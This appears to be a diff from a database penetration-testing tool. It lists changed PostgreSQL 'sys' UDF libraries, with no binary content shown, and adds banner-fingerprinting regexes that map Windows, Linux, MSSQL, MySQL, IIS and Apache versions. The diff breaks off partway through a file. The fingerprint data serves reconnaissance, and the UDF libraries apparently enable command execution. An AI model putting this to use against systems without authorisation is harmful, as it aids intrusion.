--- a/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
+++ b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
--- a/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
+++ b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
--- a/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
+++ b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
--- a/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
+++ b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
--- a/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
+++ b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
--- a/data/xml/banner/generic.xml
+++ b/data/xml/banner/generic.xml
@@ -7,39 +7,73 @@
        <info type="Windows"/>
    </regexp>

-    <regexp value="Service Pack (\d)">
+    <regexp value="Service Pack 0">
+        <info sp="0"/>
+    </regexp>
+
+    <regexp value="Service Pack 1">
        <info sp="1"/>
    </regexp>

-    <regexp value="Windows.*7\.0">
-        <info type="Windows" distrib="Vista"/>
+    <regexp value="Service Pack 2">
+        <info sp="2"/>
    </regexp>

-    <regexp value="Windows.*6\.0">
+    <regexp value="Service Pack 3">
+        <info sp="3"/>
+    </regexp>
+
+    <regexp value="Service Pack 4">
+        <info sp="4"/>
+    </regexp>
+
+    <regexp value="Service Pack 5">
+        <info sp="5"/>
+    </regexp>
+
+    <!-- Reference: https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832%28v=vs.85%29.aspx -->
+
+    <regexp value="Windows.*\b10\.0">
+        <info type="Windows" distrib="2016|10"/>
+    </regexp>
+
+    <regexp value="Windows.*\b6\.3">
+        <info type="Windows" distrib="2012 R2|8.1"/>
+    </regexp>
+
+    <regexp value="Windows.*\b6\.2">
+        <info type="Windows" distrib="2012|8"/>
+    </regexp>
+
+    <regexp value="Windows.*\b6\.1">
+        <info type="Windows" distrib="2008 R2|7"/>
+    </regexp>
+
+    <regexp value="Windows.*\b6\.0">
+        <info type="Windows" distrib="2008|Vista"/>
+    </regexp>
+
+    <regexp value="Windows.*\b5\.2">
        <info type="Windows" distrib="2003"/>
    </regexp>

-    <regexp value="Windows.*5\.2">
-        <info type="Windows" distrib="2003"/>
-    </regexp>
-
-    <regexp value="Windows.*5\.1">
+    <regexp value="Windows.*\b5\.1">
        <info type="Windows" distrib="XP"/>
    </regexp>

-    <regexp value="Windows.*5\.0">
+    <regexp value="Windows.*\b5\.0">
        <info type="Windows" distrib="2000"/>
    </regexp>

-    <regexp value="Windows.*4\.0">
+    <regexp value="Windows.*\b4\.0">
        <info type="Windows" distrib="NT 4.0"/>
    </regexp>

-    <regexp value="Windows.*3\.0">
+    <regexp value="Windows.*\b3\.0">
        <info type="Windows" distrib="NT 4.0"/>
    </regexp>

-    <regexp value="Windows.*2\.0">
+    <regexp value="Windows.*\b2\.0">
        <info type="Windows" distrib="NT 4.0"/>
    </regexp>

@@ -62,7 +96,7 @@
    </regexp>

    <regexp value="Debian">
-        <info type="Linux" distrib="Debian|Ubuntu"/>
+        <info type="Linux" distrib="Debian"/>
    </regexp>

    <regexp value="Fedora">
@@ -85,7 +119,7 @@
        <info type="Linux" distrib="Mandriva"/>
    </regexp>

-    <regexp value="Red[\-\_\ ]*Hat">
+    <regexp value="Red[\-\_\ ]?Hat">
        <info type="Linux" distrib="Red Hat"/>
    </regexp>

@@ -117,7 +151,7 @@

    <!-- Mac OSX -->

-    <regexp value="Mac[\-\_\ ]*OSX">
+    <regexp value="Mac[\-\_\ ]?OSX">
        <info type="Mac OSX"/>
    </regexp>

--- a/data/xml/banner/mssql.xml
+++ b/data/xml/banner/mssql.xml
@@ -1,12 +1,294 @@
 <?xml version="1.0" ?>
 <root>
+    <signatures release="2008 R2">
+        <signature>
+            <version>
+                10.50.2418
+            </version>
+            <servicepack>
+                1 CTP
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1797
+            </version>
+            <servicepack>
+                0+Cumulative Update 8
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1790
+            </version>
+            <servicepack>
+                0+Q2494086
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1777
+            </version>
+            <servicepack>
+                0+Cumulative Update 7
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1765
+            </version>
+            <servicepack>
+                0+Cumulative Update 6
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1753
+            </version>
+            <servicepack>
+                0+Cumulative Update 5
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1746
+            </version>
+            <servicepack>
+                0+Cumulative Update 4
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1734
+            </version>
+            <servicepack>
+                0+Cumulative Update 3
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1720
+            </version>
+            <servicepack>
+                0+Cumulative Update 2
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1702
+            </version>
+            <servicepack>
+                0+Cumulative Update 1
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1600.1
+            </version>
+            <servicepack>
+                0
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1450.3
+            </version>
+            <servicepack>
+                0
+            </servicepack>
+        </signature>
+    </signatures>
    <signatures release="2008">
+        <signature>
+            <version>
+                10.00.4311
+            </version>
+            <servicepack>
+                2+Q2494094
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.4285
+            </version>
+            <servicepack>
+                2+Cumulative Update 4
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.4279
+            </version>
+            <servicepack>
+                2+Cumulative Update 3
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.4272
+            </version>
+            <servicepack>
+                2+Cumulative Update 2
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.4266
+            </version>
+            <servicepack>
+                2+Cumulative Update 1
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.4000
+            </version>
+            <servicepack>
+                2
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2841
+            </version>
+            <servicepack>
+                1+Q2494100
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2821
+            </version>
+            <servicepack>
+                1+Cumulative Update 14
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2816
+            </version>
+            <servicepack>
+                1+Cumulative Update 13
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2808
+            </version>
+            <servicepack>
+                1+Cumulative Update 12
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2804
+            </version>
+            <servicepack>
+                0+Q2413738
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2799
+            </version>
+            <servicepack>
+                1+Cumulative Update 10
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2789
+            </version>
+            <servicepack>
+                1+Cumulative Update 9
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2775
+            </version>
+            <servicepack>
+                1+Cumulative Update 8
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2766
+            </version>
+            <servicepack>
+                1+Cumulative Update 7
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2760
+            </version>
+            <servicepack>
+                0+Q978839
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2758
+            </version>
+            <servicepack>
+                1+Q978791
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2757
+            </version>
+            <servicepack>
+                1+Cumulative Update 6
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2746
+            </version>
+            <servicepack>
+                1+Cumulative Update 5
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2740
+            </version>
+            <servicepack>
+                0+Q976761
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2734
+            </version>
+            <servicepack>
+                1+Cumulative Update 4
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2723
+            </version>
+            <servicepack>
+                1+Cumulative Update 3
+            </servicepack>
+        </signature>
        <signature>
            <version>
                10.00.2714
            </version>
            <servicepack>
-                1 + Cumulative Update 2 for Service Pack 1
+                1+Cumulative Update 2
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2712
+            </version>
+            <servicepack>
+                0+Q970507
            </servicepack>
        </signature>
        <signature>
@@ -14,7 +296,7 @@
                10.00.2710
            </version>
            <servicepack>
-                1 + Cumulative Update 1 for Service Pack 1
+                1+Cumulative Update 1
            </servicepack>
        </signature>
        <signature>
@@ -25,6 +307,54 @@
                1
            </servicepack>
        </signature>
+        <signature>
+            <version>
+                10.00.1835
+            </version>
+            <servicepack>
+                0+Cumulative Update 10
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.1828
+            </version>
+            <servicepack>
+                0+Cumulative Update 9
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.1823
+            </version>
+            <servicepack>
+                0+Cumulative Update 8
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.1818
+            </version>
+            <servicepack>
+                0+Q973601
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.1812
+            </version>
+            <servicepack>
+                0+Cumulative Update 6
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.1806
+            </version>
+            <servicepack>
+                0+Cumulative Update 5
+            </servicepack>
+        </signature>
        <signature>
            <version>
                10.00.1798
@@ -57,6 +387,22 @@
                0+Q958611
            </servicepack>
        </signature>
+        <signature>
+            <version>
+                10.00.1763
+            </version>
+            <servicepack>
+                0+Q956717
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.1755
+            </version>
+            <servicepack>
+                0+Q957387
+            </servicepack>
+        </signature>
        <signature>
            <version>
                10.00.1750
@@ -99,6 +445,158 @@
        </signature>
    </signatures>
    <signatures release="2005">
+        <signature>
+            <version>
+                9.00.5292
+            </version>
+            <servicepack>
+                4+Q2494123
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.5266
+            </version>
+            <servicepack>
+                4 Cumulative Update 3
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.5254
+            </version>
+            <servicepack>
+                4 Cumulative Update 1
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.5000
+            </version>
+            <servicepack>
+                4
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.4912
+            </version>
+            <servicepack>
+                4 CTP
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.4340
+            </version>
+            <servicepack>
+                3+Q2494112
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.4325
+            </version>
+            <servicepack>
+                3+Q2438344
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.4315
+            </version>
+            <servicepack>
+                3+Q2438344
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.4311
+            </version>
+            <servicepack>
+                3+Q2345449
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.4309
+            </version>
+            <servicepack>
+                3+Q2258854
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.4305
+            </version>
+            <servicepack>
+                3+Q983329
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.4294
+            </version>
+            <servicepack>
+                3+Q980176
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.4285
+            </version>
+            <servicepack>
+                3+Q978915
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.4278
+            </version>
+            <servicepack>
+                3+Q978791
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.4273
+            </version>
+            <servicepack>
+                3+Q976951
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.4266
+            </version>
+            <servicepack>
+                3+Q974648
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.4230
+            </version>
+            <servicepack>
+                3+Q972511
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.4226
+            </version>
+            <servicepack>
+                3+Q970279
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.4224
+            </version>
+            <servicepack>
+                3+Q971409
+            </servicepack>
+        </signature>
        <signature>
            <version>
                9.00.4220
@@ -131,6 +629,14 @@
                3+Q959195
            </servicepack>
        </signature>
+        <signature>
+            <version>
+                9.00.4053
+            </version>
+            <servicepack>
+                3
+            </servicepack>
+        </signature>
        <signature>
            <version>
                9.00.4035
@@ -139,6 +645,70 @@
                3
            </servicepack>
        </signature>
+        <signature>
+            <version>
+                9.00.3356
+            </version>
+            <servicepack>
+                2+Cumulative Update 17
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.3355
+            </version>
+            <servicepack>
+                2+Q216793
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.3330
+            </version>
+            <servicepack>
+                2+Q972510
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.3328
+            </version>
+            <servicepack>
+                2+Q970278
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.3327
+            </version>
+            <servicepack>
+                2+Q948567
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.3325
+            </version>
+            <servicepack>
+                2+Q967908
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.3320
+            </version>
+            <servicepack>
+                2+Q969142
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.3318
+            </version>
+            <servicepack>
+                2+Q967199
+            </servicepack>
+        </signature>
        <signature>
            <version>
                9.00.3315
@@ -147,6 +717,14 @@
                2+Q962970
            </servicepack>
        </signature>
+        <signature>
+            <version>
+                9.00.3310
+            </version>
+            <servicepack>
+                2+Q960090
+            </servicepack>
+        </signature>
        <signature>
            <version>
                9.00.3303
@@ -197,10 +775,10 @@
        </signature>
        <signature>
            <version>
-                9.00.3282
+                9.00.3289
            </version>
            <servicepack>
-                2+Q953752
+                2+Q937137
            </servicepack>
        </signature>
        <signature>
@@ -208,7 +786,7 @@
                9.00.3282
            </version>
            <servicepack>
-                2+Q954607
+                2+Q953752
            </servicepack>
        </signature>
        <signature>
@@ -563,6 +1141,22 @@
                2+Q933097
            </servicepack>
        </signature>
+        <signature>
+            <version>
+                9.00.3080
+            </version>
+            <servicepack>
+                2+Q970895
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.3077
+            </version>
+            <servicepack>
+                2+Q960089
+            </servicepack>
+        </signature>
        <signature>
            <version>
                9.00.3073
@@ -1727,6 +2321,22 @@
        </signature>
    </signatures>
    <signatures release="2000">
+        <signature>
+            <version>
+                8.00.2283
+            </version>
+            <servicepack>
+                4+Q971524
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                8.00.2279
+            </version>
+            <servicepack>
+                4+Q959678
+            </servicepack>
+        </signature>
        <signature>
            <version>
                8.00.2271
@@ -2071,6 +2681,14 @@
                4+Q826906
            </servicepack>
        </signature>
+        <signature>
+            <version>
+                8.00.2055
+            </version>
+            <servicepack>
+                4+Q959420
+            </servicepack>
+        </signature>
        <signature>
            <version>
                8.00.2040
--- a/data/xml/banner/mysql.xml
+++ b/data/xml/banner/mysql.xml
@@ -27,6 +27,30 @@
        <info dbms_version="1" type="Linux" distrib="Debian" release="4.0" codename="etch"/>
    </regexp>

+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+lenny">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="5.0" codename="lenny"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+squeeze">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="6.0" codename="squeeze"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+wheezy">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="7.0" codename="wheezy"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+jessie">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="8.0" codename="jessie"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+stretch">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="9.0" codename="stretch"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+buster">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="10.0" codename="buster"/>
+    </regexp>
+
    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+(sid|unstable)">
        <info dbms_version="1" type="Linux" distrib="Debian" codename="unstable"/>
    </regexp>
@@ -35,8 +59,4 @@
        <info dbms_version="1" type="Linux" distrib="Debian" codename="testing"/>
    </regexp>

-    <!-- Ubuntu -->
-    <regexp value="^(5\.0\.67)-0ubuntu6">
-        <info dbms_version="1" type="Linux" distrib="Ubuntu" release="8.10" codename="Intrepid Ibex"/>
-    </regexp>
 </root>
--- a/data/xml/banner/oracle.xml
+++ b/data/xml/banner/oracle.xml
--- a/data/xml/banner/postgresql.xml
+++ b/data/xml/banner/postgresql.xml
@@ -0,0 +1,16 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <regexp value="PostgreSQL\s+([\w\.]+)">
+        <info dbms_version="1"/>
+    </regexp>
+
+    <!-- Windows -->
+    <regexp value="Visual C\+\+">
+        <info type="Windows"/>
+    </regexp>
+
+    <regexp value="mingw([\d]+)">
+        <info type="Windows"/>
+    </regexp>
+</root>
--- a/data/xml/banner/server.xml
+++ b/data/xml/banner/server.xml
@@ -0,0 +1,858 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!--
+     References:
+     * https://en.wikipedia.org/wiki/Internet_Information_Services
+     * http://distrowatch.com
+-->
+
+<root>
+    <!-- Microsoft IIS -->
+
+    <regexp value="Microsoft-IIS/(10\.0)">
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2016|10"/>
+    </regexp>
+
+    <regexp value="Microsoft-IIS/(8\.5)">
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2012 R2|8.1"/>
+    </regexp>
+
+    <regexp value="Microsoft-IIS/(8\.0)">
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2012|8"/>
+    </regexp>
+
+    <regexp value="Microsoft-IIS/(7\.5)">
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2008 R2|7"/>
+    </regexp>
+
+    <regexp value="Microsoft-IIS/(7\.0)">
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2008|Vista"/>
+    </regexp>
+
+    <regexp value="Microsoft-IIS/(6\.0)">
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2003|XP"/>
+    </regexp>
+
+    <regexp value="Microsoft-IIS/(5\.2)">
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2003"/>
+    </regexp>
+
+    <regexp value="Microsoft-IIS/(5\.1)">
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="XP"/>
+    </regexp>
+
+    <regexp value="Microsoft-IIS/(5\.0)">
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2000"/>
+    </regexp>
+
+    <regexp value="Microsoft-IIS/(4\.0)">
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="NT 4.0"/>
+    </regexp>
+
+    <regexp value="Microsoft-IIS/(3\.0)">
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="NT 4.0"/>
+    </regexp>
+
+    <regexp value="Microsoft-IIS/(2\.0)">
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="NT 4.0"/>
+    </regexp>
+
+    <!-- Apache -->
+
+    <regexp value="Apache$">
+        <info technology="Apache"/>
+    </regexp>
+
+    <regexp value="Apache/([\w\.]+)">
+        <info technology="Apache" tech_version="1"/>
+    </regexp>
+
+    <regexp value="Apache[\-\_\ ]AdvancedExtranetServer/([\w\.]+)">
+        <info technology="Apache" tech_version="1"/>
+    </regexp>
+
+    <!-- Apache: CentOS -->
+
+    <regexp value="Apache/2\.0\.46 \(CentOS\)">
+        <info type="Linux" distrib="CentOS" release="3.9"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.52 \(CentOS\)">
+        <info type="Linux" distrib="CentOS" release="4.9"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.3 \(CentOS\)">
+        <info type="Linux" distrib="CentOS" release="5.10"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.15 \(CentOS\)">
+        <info type="Linux" distrib="CentOS" release="6.8"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.6 \(CentOS\)">
+        <info type="Linux" distrib="CentOS" release="7-1708"/>
+    </regexp>
+
+    <!-- Apache: Debian -->
+
+    <regexp value="Apache/1\.0\.5 \(Unix\) Debian/GNU">
+        <info type="Linux" distrib="Debian" release="1.1" codename="buzz"/>
+    </regexp>
+
+    <regexp value="Apache/1\.1\.1 \(Unix\) Debian/GNU">
+        <info type="Linux" distrib="Debian" release="1.2" codename="rex"/>
+    </regexp>
+
+    <regexp value="Apache/1\.1\.3 \(Unix\) Debian/GNU">
+        <info type="Linux" distrib="Debian" release="1.3" codename="bo"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.0 \(Unix\) Debian/GNU">
+        <info type="Linux" distrib="Debian" release="2.0" codename="hamm"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.3 \(Unix\) Debian/GNU">
+        <info type="Linux" distrib="Debian" release="2.1" codename="slink"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.9 \(Unix\) Debian\/GNU">
+        <info type="Linux" distrib="Debian" release="2.2" codename="potato"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.26 \(Debian GNU\/Linux\)">
+        <info type="Linux" distrib="Debian" release="3.0" codename="woody"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.33 \(Debian GNU\/Linux\)">
+        <info type="Linux" distrib="Debian" release="3.1" codename="sarge"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.54 \(Debian GNU\/Linux\)">
+        <info type="Linux" distrib="Debian" release="3.1" codename="sarge"/>
+    </regexp>
+
+    <regexp value="Apache/1\.3\.34 \(Debian GNU\/Linux\)">
+        <info type="Linux" distrib="Debian" release="4.0" codename="etch"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.3 \(Debian\)">
+        <info type="Linux" distrib="Debian" release="4.0" codename="etch"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.6 \(Debian\)">
+        <info type="Linux" distrib="Debian" release="4.0" codename="etch" updated="True"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.9 \(Debian\)">
+        <info type="Linux" distrib="Debian" release="5.0" codename="lenny"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.16 \(Debian\)">
+        <info type="Linux" distrib="Debian" release="6.0" codename="squeeze"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.22 \(Debian\)">
+        <info type="Linux" distrib="Debian" release="7.0" codename="wheezy"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.10 \(Debian\)">
+        <info type="Linux" distrib="Debian" release="8.0" codename="jessie"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.25 \(Debian\)">
+        <info type="Linux" distrib="Debian" release="9.0" codename="stretch"/>
+    </regexp>
+
+    <!-- Apache: Fedora -->
+
+    <regexp value="Apache/2\.0\.47 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="1" codename="Yarrow"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.50 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="1" codename="Yarrow" updated="True"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.49 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="2" codename="Tettnang"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.51 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="2" codename="Tettnang" updated="True"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.52 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="3" codename="Heidelberg"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.53 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="3" codename="Heidelberg" updated="True"/>
+    </regexp>
+
+    <regexp value="Apache/2\.0\.54 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="4" codename="Stentz"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.0 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="5" codename="Bordeaux"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.2 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="5" codename="Bordeaux" updated="True"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.3 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="6" codename="Zod"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.4 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="7" codename="Moonshine"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.6 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="6|7" codename="Zod|Moonshine" updated="True"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.6 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="8" codename="Werewolf"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.8 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="9" codename="Sulphur"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.10 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="10" codename="Cambridge"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.11 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="11" codename="Leonidas"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.13 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="12" codename="Constantine"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.15 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="13" codename="Goddard"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.16 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="14" codename="Laughlin"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.17 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="15" codename="Lovelock"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.21 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="16" codename="Verne"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.22 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="17" codename="Beefy"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.3 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="18" codename="Spherical"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.4 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="19" codename="Schrodingers"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.6 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="20" codename="Heisenbug"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.10 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="21"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.12 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="22"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.16 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="23"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.18 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="24"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.23 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="25"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.25 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="26"/>
+    </regexp>
+
